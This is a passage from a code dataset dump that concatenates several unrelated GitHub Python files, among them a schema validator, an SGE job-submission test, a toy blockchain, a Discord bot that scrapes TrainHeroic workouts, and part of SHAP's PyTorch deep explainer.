DATA_PATH.open(\"w\") as data_file:\n json.dump(data, data_file, indent=2)\n data_file.write(\"\\n\")\n","repo_name":"underyx/nvc-backlog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"39277660178","text":"\"\"\"\nBaseValidator module.\nIt serves as an base to all other validators childs.\n\"\"\"\n\nfrom datetime import datetime\nimport jsonschema\nfrom jsonschema import Draft4Validator\nfrom bson.objectid import ObjectId\n\n_types = {\n 'object_id': ObjectId\n}\n\n\nclass ValidationError(Exception):\n def __init__(self, *args, errors: list=None, messages: list=None, **kwargs):\n super().__init__(*args, **kwargs)\n self.messages = messages\n self.errors = errors\n\n\nclass JsonSchemaValidator():\n TYPES = _types\n SCHEMA = dict()\n VALIDATOR = None\n\n def __init__(self, schema: dict, additional_types: dict=None, **kwargs):\n \"\"\"\n Arguments:\n schema {dict} -- valida jsonschema\n Keyword Arguments:\n additional_types {dict} -- additional types to be checked against (default: {None})\n \"\"\"\n\n self.SCHEMA = schema\n if additional_types:\n self.TYPES = dict(self.TYPES, **additional_types)\n self.VALIDATOR = Draft4Validator(self.SCHEMA, types=self.TYPES)\n self.VALIDATOR.VALIDATORS['method'] = self.__method\n\n def __method(self, validator, fn, instance, schema):\n try:\n fn(instance, validator=validator)\n except Exception as e:\n yield ValidationError(\"%r failed for %r: %r\" % (instance, fn.__name__, e))\n\n def validate(self, instance):\n messages = list()\n errors = list()\n for e in self.VALIDATOR.iter_errors(instance):\n errors.append(e)\n messages.append(e.schema.get('description', e.message))\n if len(errors):\n msg = '\\n'.join(messages)\n raise ValidationError(msg, messages=messages, errors=errors)\n return True\n\ndef validate_once(instance, schema, additional_types: dict=None, **kwargs):\n validator = JsonSchemaValidator(schema, additional_types=additional_types, **kwargs)\n validator.validate(instance)\n return True\n\n\nclass BaseValidator:\n \"\"\"\n BaseValidator class.\n\n :method validate(ruleSet, methods): Validation main function.\n :method validate_datetime(field, rule): Validates if a field is a datatime.\n :method validate_integer(field, rule): Validates if a field is an integer.\n :method validate_float(field, rule): Validates if a field is a float.\n :method validate_str(field, rule): Validates if a field is a string.\n :method validate_objectid(field, rule): Validates if a field is an objectid.\n :method validate_object(field, rule): Validates if a field is an object.\n :method validate_array(field, rule): Validates if a field is an array\n \"\"\"\n CREATE = \"CREATE\"\n UPDATE = \"UPDATE\"\n DELETE = \"DELETE\"\n REQUIRED = \"required\"\n OPTIONAL = \"optional\"\n MISSING = \"missing\"\n\n def __init__(self, params):\n\n self.params = params\n self.errors = []\n self.rules = {\n\n }\n\n def validate(self, rule_set, methods=[]):\n \"\"\"\n Validation main function.\n\n :param rule_set: Sets of rules to be validated.\n :param methods: Methods to be called.\n :return: Return is there was any error.\n \"\"\"\n valid = True\n if self.rules.get(rule_set) is None:\n raise Exception(\"O Conjunto de regras \" +\n rule_set + \" não esta definido.\")\n\n for k, rule in self.rules[rule_set].items():\n if rule.get(\"presence\") is None:\n raise Exception(\n \"A propriedade presence é obrigatória na regra \" + k)\n\n if rule.get(\"format\") is None:\n raise Exception(\n \"A propriedade format é obrigatória na regra \" + k)\n\n if rule[\"presence\"] == self.REQUIRED and self.params.get(k) is None:\n self.errors.append(\"Atributo '\" + k +\n \"' é requerido e não está presente\")\n\n elif rule[\"presence\"] == self.MISSING and self.params.get(k) is not None:\n self.errors.append(\"Atributo '\" + k +\n \"' não pode estar preenchido\")\n\n elif self.params.get(k) is not None:\n if \"datetime\" == rule[\"format\"]:\n if not self.validate_datetime(self.params[k], rule):\n self.errors.append(\n \"A data '\" + k + \"' esta em um formato inválido: \" + self.params[k])\n\n if \"integer\" == rule[\"format\"]:\n if not self.validate_integer(self.params[k], rule):\n self.errors.append(\n \"O inteiro '\" + k + \"' esta em um formato inválido: \" + self.params[k])\n\n if \"float\" == rule[\"format\"]:\n if not self.validate_float(self.params[k], rule):\n self.errors.append(\n \"O decimal '\" + k + \"' esta em um formato inválido: \" + self.params[k])\n\n if \"string\" == rule[\"format\"]:\n if not self.validate_str(self.params[k], rule):\n self.errors.append(\n \"A string '\" + k + \"' esta em um formato inválido\")\n\n if \"array\" == rule[\"format\"]:\n if not self.validate_array(self.params[k], rule):\n self.errors.append(\n \"O array '\" + k + \"' esta em um formato inválido\")\n\n if \"objectid\" == rule[\"format\"]:\n if not self.validate_objectid(self.params[k], rule):\n self.errors.append(\n \"O ObjectId '\" + k + \"' esta em um formato inválido: \" + self.params[k])\n\n if \"object\" == rule[\"format\"]:\n if not self.validate_object(self.params[k], rule):\n self.errors.append(\n \"O Object '\" + k + \"' esta em um formato inválido\")\n\n if \"boolean\" == rule[\"format\"]:\n if not self.validate_boolean(self.params[k], rule):\n self.errors.append(\n \"O Boolean '\" + k + \"' esta em um formato inválido\")\n\n for method in methods:\n m = getattr(self, method)\n if m is not None:\n m()\n\n return len(self.errors) == 0\n\n def validate_datetime(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is a datatime.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n a = datetime.strptime(field[:19], \"%Y-%m-%dT%H:%M:%S\")\n return True\n except Exception as e:\n return False\n\n def validate_integer(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an integer.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n a = int(field)\n return True\n except Exception as e:\n return False\n\n def validate_float(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is a float.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n a = float(field)\n return True\n except Exception as e:\n return False\n\n def validate_str(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is a string.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n valid = True\n a = str(field)\n if rule.get(\"min\"):\n valid = valid and len(a) >= rule[\"min\"]\n if rule.get(\"max\"):\n valid = valid and len(a) <= rule[\"max\"]\n\n return valid\n except Exception as e:\n return False\n\n def validate_objectid(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an objectid.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n valid = True\n a = ObjectId(field)\n return True\n except Exception as e:\n return False\n\n def validate_object(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an object.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n valid = True\n a = dict(field)\n return True\n except Exception as e:\n return False\n\n def validate_array(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an array.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n valid = True\n a = list(field)\n if rule.get(\"min\"):\n valid = valid and len(a) >= rule[\"min\"]\n if rule.get(\"max\"):\n valid = valid and len(a) <= rule[\"max\"]\n return valid\n except Exception as e:\n return False\n\n def validate_boolean(self, field: str, rule: dict = {}):\n \"\"\"\n Validates if a field is an boolean.\n\n :param field: Field to be validated.\n :param rule: Rule to be used for validation.\n :return: Boolean value depending on the validation results.\n \"\"\"\n try:\n return type(field) == bool\n except Exception as e:\n return False\n","repo_name":"newwaybrazil/mongo-odm","sub_path":"odm/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":10150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2347831017","text":"import pytest\nimport pytest_mock\nimport os\n\nos.environ['SGE_ROOT'] = '/opt'\nos.environ['SGE_ARCH'] = 'amd64'\nimport sge.submit\n\nRESPONSE = \"\"\"Some stuff about a warning.\nYour job 35305 (\"sleeper.sh\") has been submitted\n\"\"\"\n\n@pytest.fixture\ndef mega_job_request():\n import datetime\n request = sge.submit.JobRequest()\n request.command = '/usr/local/bin/quuxtable'\n request.arguments = ['foo', 'baz', 'quux']\n request.deadline_time = datetime.datetime(2018, 1, 5)\n request.start_time = datetime.datetime(2018, 1, 4)\n request.environment = {'bax' : 'qaax', 'foot' : 'head'}\n request.job_submission_state = sge.submit.JobSubmissionState.HOLD_STATE\n request.join_stdout_and_stderr = True\n\n request.name = 'bartholomew'\n request.output_path = \"/tmp\"\n request.working_directory = '/home/funkytron/mywd'\n\n return request\n\n@pytest.fixture\ndef basic_job_request():\n request = sge.submit.JobRequest()\n request.command = '/usr/local/bin/quuxtable'\n return request\n\n \n\nEXPECTED_ARGS = ['/opt/bin/amd64/qsub', '-dl', '201801050000.00', '-a', '201801040000.00', \n '-v', 'bax=qaax,foot=head', '-h', '-j', 'yes', '-N', 'bartholomew', \n '-o', '/tmp', '-wd', '/home/funkytron/mywd', \n '/usr/local/bin/quuxtable', 'foo', 'baz', 'quux']\ndef test_do_something_cool(mega_job_request, mocker):\n mocker.patch('sge.shell.run')\n sge.shell.run.return_value = RESPONSE\n job_id = mega_job_request.submit()\n sge.shell.run.assert_called_once_with(*EXPECTED_ARGS)\n assert job_id == 35305\n\nEXPECTED_ARGS2 = ['/opt/bin/amd64/qsub', '/usr/local/bin/quuxtable']\ndef test_do_something_basic(basic_job_request, mocker):\n mocker.patch('sge.shell.run')\n sge.shell.run.return_value = RESPONSE\n job_id = basic_job_request.submit()\n sge.shell.run.assert_called_once_with(*EXPECTED_ARGS2)\n assert job_id == 35305\n","repo_name":"tylergannon/remote_sge","sub_path":"src/sge/tests/job_submission_test.py","file_name":"job_submission_test.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"44736700376","text":"import datetime as d\nimport hashlib as h\n#from sqlite3 import Timestamp\n\n\nclass Block:\n def __init__(self, index, timestamp, data, prevhash):\n self.index = index\n self.timestamp = timestamp\n self.data = data\n self.prevhash = prevhash\n\n self.hash = self.hashblock()\n\n def hashblock(self):\n block_encryption = h.sha256()\n assemble = bytes((str(self.index) + str(self.timestamp) + str(self.data) + str(self.prevhash)).encode('utf-8'))\n block_encryption.update(assemble)\n return block_encryption.hexdigest()\n\n @staticmethod\n def genesisblock():\n return Block(0, d.datetime.now(), \"genesis block trabsaction\", \" \")\n\n @staticmethod\n def newBlock(lastblock):\n index = lastblock.index + 1\n timestamp = d.datetime.now()\n hashblock = lastblock.hash\n data = \"Transaction \" + str(index)\n return Block(index, timestamp, data, hashblock)\n\n\nblockchain = [Block.genesisblock()]\nprevblock = blockchain[0]\n\nfor i in range(0, 5):\n addblock = Block.newBlock(prevblock)\n blockchain.append(addblock)\n prevblock = addblock\n\n print(\"Block ID {} \".format(addblock.index))\n print(\"Timestamp:{}\".format(addblock.timestamp))\n print(\"Hash of the block:{}\".format(addblock.hash))\n print(\"Previous Block Hash:{}\".format(addblock.prevhash))\n print(\"data:{}\\n\".format(addblock.data))\n\n","repo_name":"soaresvi/blockchain_codes","sub_path":"basic_blockchain.py","file_name":"basic_blockchain.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16323244505","text":"import logging\nimport os\nfrom configs import config\n\n\ndef get_logger():\n log = logging.getLogger('mainlgr')\n os.chdir(os.path.join(config.PROJECT_PATH, config.LOGS_PATH))\n logging.basicConfig(filename='automation.log',\n format='[%(levelname)s] %(asctime)s %(message)s',\n datefmt='%d-%m-%y %H:%M:%S', level=logging.INFO, filemode='w')\n os.chdir(config.PROJECT_PATH)\n return log\n","repo_name":"rishjaiswal/python-automation-framework","sub_path":"utils/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"35681119477","text":"import collections\nfrom typing import List\n\n\nclass Solution:\n def largestOverlap(self, img1: List[List[int]], img2: List[List[int]]) -> int:\n # filter all positions that equal to 1 in img1 and img2\n img1 = [(i, j) for i, row in enumerate(img1)\n for j, item in enumerate(row) if item]\n img2 = [(i, j) for i, row in enumerate(img2)\n for j, item in enumerate(row) if item]\n # mapping overlap count between every possible translation\n count = collections.Counter((x1-x2, y1-y2)\n for x1, y1 in img1 for x2, y2 in img2)\n return max(count.values() or [0])\n\n\nsol = Solution()\nprint(sol.largestOverlap([[1, 1, 0], [0, 1, 0], [0, 1, 0]], [\n [0, 0, 0], [0, 1, 1], [0, 0, 1]]))\n","repo_name":"kranzCh/LeetcodePy","sub_path":"old_solutions_without_extension/P835.py","file_name":"P835.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23983382785","text":"from webbot import Browser \nfrom bs4 import BeautifulSoup\nimport time\nimport discord\nimport sys\n\nTOKEN = ''\nclient = discord.Client()\n@client.event\nasync def on_ready():\n\tawait client.change_presence(activity = discord.Game('th!help'))\n\n\n\n@client.event\nasync def on_message(message):\n\tif message.content == \"th!help\":\n\t\tawait message.channel.send(\"Use th!workout to get todays workout! Please note that it may take a while for the workout to be sent after the command\")\n\tif message.content == \"th!workout\":\n\t\tglobal pretext\n\t\tglobal insactive\n\t\tglobal flexactive\n\t\tglobal h5active\n\t\tglobal iactive\n\t\tglobal cellactive\n\t\tglobal headactive\n\t\tglobal hactive\n\t\turl = 'https://athlete.trainheroic.com/#/login?redirectUrl=https%253A%252F%252Fathlete.trainheroic.com%252F%2523%252Ftraining'\n\t\tweb = Browser()\n\t\tweb.go_to(url)\n\t\tweb.type('@gmail.com' , into='Email')\n\t\tweb.type('' , into='Password' , id='passwordFieldId')\n\t\tweb.click('Log in' , tag='span')\n\t\ttime.sleep(3)\n\t\tpretext = ''\n\t\ttext = ''\n\t\tinsactive = False\n\t\tflexactive = False\n\t\th5active = False\n\t\tiactive = False\n\t\tcellactive = False\n\t\theadactive = False\n\t\thactive = False\n\t\ttextlist = []\n\t\tdef textgrab(start, end, funactive):\n\t\t\tglobal pretext\n\t\t\tglobal insactive\n\t\t\tglobal flexactive\n\t\t\tglobal h5active\n\t\t\tglobal iactive\n\t\t\tglobal cellactive\n\t\t\tglobal headactive\n\t\t\tglobal hactive\n\t\t\tif webtext[i+len(start)-1:i+len(start)+len(end)-1] == end and funactive:\n\t\t\t\tif start == '

':\n\t\t\t\t\ttextlist.append([pretext, 'flex'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\tflexactive = False\n\t\t\t\tif start == '

':\n\t\t\t\t\ttextlist.append([pretext, 'ins'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\tinsactive = False\n\t\t\t\tif start == '

':\n\t\t\t\t\ttextlist.append([pretext, 'h5'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\th5active = False\n\t\t\t\tif start == '':\n\t\t\t\t\tpretext = pretext[:-1] + '\\n' + pretext[-1:]\t\t\t\t\n\t\t\t\t\ttextlist.append([pretext, 'i'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\tiactive = False\n\t\t\t\tif start == 'cell\" aria-hidden=\"false\">':\n\t\t\t\t\ttextlist.append([pretext, 'cell'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\tcellactive = False\n\t\t\t\tif start == 'class=\"header ng-hide\" aria-hidden=\"true\">':\n\t\t\t\t\ttextlist.append([pretext, 'head'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\theadactive = False\n\t\t\t\tif start == 'class=\"header\" aria-hidden=\"false\">':\n\t\t\t\t\ttextlist.append([pretext, 'head'])\n\t\t\t\t\tpretext = ''\n\t\t\t\t\thactive = False\n\t\t\t\treturn False\n\n\n\t\t\tif funactive or webtext[i:i+len(start)] == start:\n\t\t\t\tif start == '
':\n\t\t\t\t\th5active = True\n\t\t\t\tif start == '

':\n\t\t\t\t\tflexactive = True\n\t\t\t\tif start == '

':\n\t\t\t\t\tinsactive = True\n\t\t\t\tif start == '':\n\t\t\t\t\tiactive = True\n\t\t\t\tif start == 'cell\" aria-hidden=\"false\">':\n\t\t\t\t\tcellactive = True\n\t\t\t\tif start == 'class=\"header ng-hide\" aria-hidden=\"true\">':\n\t\t\t\t\theadactive = True\n\t\t\t\tif start == 'class=\"header\" aria-hidden=\"false\">':\n\t\t\t\t\thactive = True\n\t\t\t\tpretext += webtext[i+len(start)]\n\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\n\t\twebtext = web.get_page_source()\n\n\n\t\tfor i in range(len(webtext) - 24):\n\t\t\ttextgrab('

', '

', insactive)\n\t\t\ttextgrab('

', '

', flexactive)\n\t\t\ttextgrab('
', '
', h5active)\n\t\t\ttextgrab('', '', iactive)\n\t\t\ttextgrab('cell\" aria-hidden=\"false\">', '', cellactive)\n\t\t\ttextgrab('class=\"header ng-hide\" aria-hidden=\"true\">', '', headactive)\n\t\t\ttextgrab('class=\"header\" aria-hidden=\"false\">', '', hactive)\n\n\t\tdef divide_chunks(l, n): \n\t\t\tfor i in range(0, len(l), n): \n\t\t\t\tyield l[i:i + n]\n\n\t\t\n\t\tnewtextlist = []\n\t\tnewnewtextlist = []\n\t\tembed = discord.Embed(\n\t\t\tcolor=0x5CDBF0,\n\t\t\ttimestap='now'\n\t\t\t)\n\n\t\tfor i in range(len(textlist)):\n\t\t\tif len(textlist[i][0]) >= 1 and 'COMPLETE' not in textlist[i][0]:\n\t\t\t\tnewtextlist.append([textlist[i][0][:-1], textlist[i][1]])\n\t\t\n\t\tprint(newtextlist)\n\t\tfor i in range(len(newtextlist)):\n\t\t\tif newtextlist[i][1] == 'head':\n\t\t\t\tnewtextlist[i+1][0] += ' '+ int(newtextlist[i][0][0]) * '- '\n\t\t\t\tnewtextlist[i+1][0] = '\\n' + newtextlist[i+1][0] + '\\n'\n\t\t\t\tnewtextlist[i+2][0] += ' ' + int(newtextlist[i][0][0]) * '- ' + '\\n\\n'\n\t\t\tif newtextlist[i][1] == 'h5':\n\t\t\t\tnewnewtextlist.append([newtextlist[i][0], ''])\n\t\t\telif len(newnewtextlist) > 0 and newtextlist[i][1] != 'head':\n\t\t\t\tnewnewtextlist[-1][1] += newtextlist[i][0]\n\t\tfor i in newnewtextlist:\n\t\t\tif i[0] != '':\n\t\t\t\tembed.add_field(name = i[0], value = i[1])\n\t\tawait message.channel.send(embed=embed)\n\t\t\n\tif str(message.author) == 'amberhalo#7086':\n\t\tif message.content == \"th!end\":\n\t\t\tsys.exit()\nclient.run(TOKEN)\n","repo_name":"amberhalo/TrainHeroic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40702047456","text":"from Controller import Controller\nimport time\nimport sys\ndef main():\n graph_path = sys.argv[1]\n save_path = sys.argv[2]\n c = Controller(graph_path,save_path)\n #c.draw_graphs()\n #return\n# c.min_max_path_charts()\n start = ntimes = step = 0\n\n while(True):\n option = int(input(\"Select option: \\n\"+\n \"1. Execute fishbone heuristics \\n\"+\n \"2. Execute spiderweb heuristics\\n\"+\n \"3. Calculate properties\\n\"\n \"5. Compare heuristics and generate plot\\n\"))\n t = time.time()\n if option in {1,2}:\n start = int(input(\"Start: \"))\n ntimes = int(input(\"Iterations: \"))\n step = int(input(\"Step: \"))\n\n if(option == 1):\n c.executeFishbone(start, ntimes, step)\n elif(option == 2):\n c.executeSpiderweb(start, ntimes, step)\n elif(option == 3):\n c.calculate_properties()\n elif(option == 4):\n c.compare()\n else:\n break\n print(\"Time: \"+str(time.time()-t))\n\n #c.draw_graphs()\n# t = time.time()\n# print(\"Efficiency ratio: \"+str(c.efficiency()))\n# print(\"Time: \"+str(time.time()-t))\n# print(\"Edges ratio: \" + str(c.ratio()))\nif __name__ == \"__main__\":\n main()\n","repo_name":"willunicamp/droneways","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"4986635005","text":"from scipy.sparse import csr_matrix, vstack, hstack, eye, issparse\nimport numpy as np\nimport pandas as pd\n\ndef findcommonZ(Z1, Z2):\n '''\n FINDCOMMONZ --- Find common(distinct) Z and permutation matrices R1, R2\n\n R1,R2,Z = findcommonZ(Z1,Z2)\n\n Given two vectors of monomials Z1 and Z2, this \n function will compute another vector of monomials Z\n containing all the distinct monomials of Z1 and Z2, and\n permutation matrices R1, R2 such that\n\n Z1 = R1*Z\n Z2 = R2*Z\n\n Assumption: all the monomials in Z1, as well as\n the monomials in Z2, are DISTINCT --- but Z1 and Z2 may \n have common monomials.\n '''\n\n # Check if Z1 and Z2 are sparse matrix\n if not issparse(Z1):\n Z1 = csr_matrix(Z1)\n if not issparse(Z2):\n Z2 = csr_matrix(Z2)\n\n if (Z1.shape[0] + Z2.shape[0]) <= 1:\n Z = vstack([Z1, Z2])\n R1 = eye(Z1.shape[0], Z.shape[0])\n R2 = eye(Z2.shape[0], Z.shape[0])\n\n return R1, R2, Z\n \n # Constructing index matrix\n sizeZ1 = Z1.shape[0]\n Ind1 = np.arange(sizeZ1)[:, None]\n sizeZ2 = Z2.shape[0]\n Ind2 = np.arange(sizeZ2)[:, None]\n Ind = np.block([[Ind1, np.full(Ind1.shape, sizeZ2)], [np.full(Ind2.shape, sizeZ1), Ind2]])\n \n # Constructing Z\n ZZ = vstack([Z1, Z2])\n ZZ_temp = pd.DataFrame(ZZ.toarray())\n IndSort = ZZ_temp.sort_values(by=list(ZZ_temp.columns)).index\n ZZ = ZZ[IndSort]\n ZTemp = np.diff(ZZ.toarray(), prepend=ZZ[-1:].toarray(), axis=0) # Functionally equivalent to MATLAB code\n I = np.where(np.any(ZTemp != 0, axis=1))[0]\n INull = np.where(np.all(ZTemp == 0, axis=1))[0]\n if I.size == 0:\n I = 0\n INull = 1\n Z = ZZ[I]\n\n # Constructing permutation matrix\n Ind = Ind[IndSort]\n for i in INull:\n Ind[i - 1, 1] = Ind[i, 1]\n Ind[i, 1] = sizeZ2\n Ind = Ind[I]\n\n # hstack in scipy.sparse\n R1 = hstack([eye(sizeZ1), csr_matrix((sizeZ1, len(I) - sizeZ1))]).tocsr()\n R1 = R1[:, Ind[:, 0]]\n R2 = hstack([eye(sizeZ2), csr_matrix((sizeZ2, len(I) - sizeZ2))]).tocsr()\n R2 = R2[:, Ind[:, 1]]\n\n Z = csr_matrix(Z)\n\n return R1, R2, Z","repo_name":"zm2404/SOSPy","sub_path":"SOSPy/SOSPy/findcommonZ.py","file_name":"findcommonZ.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36532111678","text":"import warnings\n\nimport numpy as np\nfrom packaging import version\n\nfrom .._explainer import Explainer\nfrom .deep_utils import _check_additivity\n\ntorch = None\n\n\nclass PyTorchDeep(Explainer):\n\n def __init__(self, model, data):\n # try and import pytorch\n global torch\n if torch is None:\n import torch\n if version.parse(torch.__version__) < version.parse(\"0.4\"):\n warnings.warn(\"Your PyTorch version is older than 0.4 and not supported.\")\n\n # check if we have multiple inputs\n self.multi_input = False\n if isinstance(data, list):\n self.multi_input = True\n if not isinstance(data, list):\n data = [data]\n self.data = data\n self.layer = None\n self.input_handle = None\n self.interim = False\n self.interim_inputs_shape = None\n self.expected_value = None # to keep the DeepExplainer base happy\n if type(model) == tuple:\n self.interim = True\n model, layer = model\n model = model.eval()\n self.layer = layer\n self.add_target_handle(self.layer)\n\n # if we are taking an interim layer, the 'data' is going to be the input\n # of the interim layer; we will capture this using a forward hook\n with torch.no_grad():\n _ = model(*data)\n interim_inputs = self.layer.target_input\n if type(interim_inputs) is tuple:\n # this should always be true, but just to be safe\n self.interim_inputs_shape = [i.shape for i in interim_inputs]\n else:\n self.interim_inputs_shape = [interim_inputs.shape]\n self.target_handle.remove()\n del self.layer.target_input\n self.model = model.eval()\n\n self.multi_output = False\n self.num_outputs = 1\n with torch.no_grad():\n outputs = model(*data)\n\n # also get the device everything is running on\n self.device = outputs.device\n if outputs.shape[1] > 1:\n self.multi_output = True\n self.num_outputs = outputs.shape[1]\n self.expected_value = outputs.mean(0).cpu().numpy()\n\n def add_target_handle(self, layer):\n input_handle = layer.register_forward_hook(get_target_input)\n self.target_handle = input_handle\n\n def add_handles(self, model, forward_handle, backward_handle):\n \"\"\"\n Add handles to all non-container layers in the model.\n Recursively for non-container layers\n \"\"\"\n handles_list = []\n model_children = list(model.children())\n if model_children:\n for child in model_children:\n handles_list.extend(self.add_handles(child, forward_handle, backward_handle))\n else: # leaves\n handles_list.append(model.register_forward_hook(forward_handle))\n handles_list.append(model.register_full_backward_hook(backward_handle))\n return handles_list\n\n def remove_attributes(self, model):\n \"\"\"\n Removes the x and y attributes which were added by the forward handles\n Recursively searches for non-container layers\n \"\"\"\n for child in model.children():\n if 'nn.modules.container' in str(type(child)):\n self.remove_attributes(child)\n else:\n try:\n del child.x\n except AttributeError:\n pass\n try:\n del child.y\n except AttributeError:\n pass\n\n def gradient(self, idx, inputs):\n self.model.zero_grad()\n X = [x.requires_grad_() for x in inputs]\n outputs = self.model(*X)\n selected = [val for val in outputs[:, idx]]\n grads = []\n if self.interim:\n interim_inputs = self.layer.target_input\n for idx, input in enumerate(interim_inputs):\n grad = torch.autograd.grad(selected, input,\n retain_graph=True if idx + 1 < len(interim_inputs) else None,\n allow_unused=True)[0]\n if grad is not None:\n grad = grad.cpu().numpy()\n else:\n grad = torch.zeros_like(X[idx]).cpu().numpy()\n grads.append(grad)\n del self.layer.target_input\n return grads, [i.detach().cpu().numpy() for i in interim_inputs]\n else:\n for idx, x in enumerate(X):\n grad = torch.autograd.grad(selected, x,\n retain_graph=True if idx + 1 < len(X) else None,\n allow_unused=True)[0]\n if grad is not None:\n grad = grad.cpu().numpy()\n else:\n grad = torch.zeros_like(X[idx]).cpu().numpy()\n grads.append(grad)\n return grads\n\n def shap_values(self, X, ranked_outputs=None, output_rank_order=\"max\", check_additivity=True):\n # X ~ self.model_input\n # X_data ~ self.data\n\n # check if we have multiple inputs\n if not self.multi_input:\n assert not isinstance(X, list), \"Expected a single tensor model input!\"\n X = [X]\n else:\n assert isinstance(X, list), \"Expected a list of model inputs!\"\n\n X = [x.detach().to(self.device) for x in X]\n\n model_output_values = None\n\n if ranked_outputs is not None and self.multi_output:\n with torch.no_grad():\n model_output_values = self.model(*X)\n # rank and determine the model outputs that we will explain\n if output_rank_order == \"max\":\n _, model_output_ranks = torch.sort(model_output_values, descending=True)\n elif output_rank_order == \"min\":\n _, model_output_ranks = torch.sort(model_output_values, descending=False)\n elif output_rank_order == \"max_abs\":\n _, model_output_ranks = torch.sort(torch.abs(model_output_values), descending=True)\n else:\n emsg = \"output_rank_order must be max, min, or max_abs!\"\n raise ValueError(emsg)\n model_output_ranks = model_output_ranks[:, :ranked_outputs]\n else:\n model_output_ranks = (torch.ones((X[0].shape[0], self.num_outputs)).int() *\n torch.arange(0, self.num_outputs).int())\n\n # add the gradient handles\n handles = self.add_handles(self.model, add_interim_values, deeplift_grad)\n if self.interim:\n self.add_target_handle(self.layer)\n\n # compute the attributions\n output_phis = []\n for i in range(model_output_ranks.shape[1]):\n phis = []\n if self.interim:\n for k in range(len(self.interim_inputs_shape)):\n phis.append(np.zeros((X[0].shape[0], ) + self.interim_inputs_shape[k][1: ]))\n else:\n for k in range(len(X)):\n phis.append(np.zeros(X[k].shape))\n for j in range(X[0].shape[0]):\n # tile the inputs to line up with the background data samples\n tiled_X = [X[t][j:j + 1].repeat(\n (self.data[t].shape[0],) + tuple([1 for k in range(len(X[t].shape) - 1)])) for t\n in range(len(X))]\n joint_x = [torch.cat((tiled_X[t], self.data[t]), dim=0) for t in range(len(X))]\n # run attribution computation graph\n feature_ind = model_output_ranks[j, i]\n sample_phis = self.gradient(feature_ind, joint_x)\n # assign the attributions to the right part of the output arrays\n if self.interim:\n sample_phis, output = sample_phis\n x, data = [], []\n for k in range(len(output)):\n x_temp, data_temp = np.split(output[k], 2)\n x.append(x_temp)\n data.append(data_temp)\n for t in range(len(self.interim_inputs_shape)):\n phis[t][j] = (sample_phis[t][self.data[t].shape[0]:] * (x[t] - data[t])).mean(0)\n else:\n for t in range(len(X)):\n phis[t][j] = (torch.from_numpy(sample_phis[t][self.data[t].shape[0]:]).to(self.device) * (X[t][j: j + 1] - self.data[t])).cpu().detach().numpy().mean(0)\n output_phis.append(phis[0] if not self.multi_input else phis)\n # cleanup; remove all gradient handles\n for handle in handles:\n handle.remove()\n self.remove_attributes(self.model)\n if self.interim:\n self.target_handle.remove()\n\n # check that the SHAP values sum up to the model output\n if check_additivity:\n if model_output_values is None:\n with torch.no_grad():\n model_output_values = self.model(*X)\n\n _check_additivity(self, model_output_values.cpu(), output_phis)\n\n if not self.multi_output:\n return output_phis[0]\n elif ranked_outputs is not None:\n return output_phis, model_output_ranks\n else:\n return output_phis\n\n# Module hooks\n\n\ndef deeplift_grad(module, grad_input, grad_output):\n \"\"\"The backward hook which computes the deeplift\n gradient for an nn.Module\n \"\"\"\n # first, get the module type\n module_type = module.__class__.__name__\n # first, check the module is supported\n if module_type in op_handler:\n if op_handler[module_type].__name__ not in ['passthrough', 'linear_1d']:\n return op_handler[module_type](module, grad_input, grad_output)\n else:\n warnings.warn(f'unrecognized nn.Module: {module_type}')\n return grad_input\n\n\ndef add_interim_values(module, input, output):\n \"\"\"The forward hook used to save interim tensors, detached\n from the graph. Used to 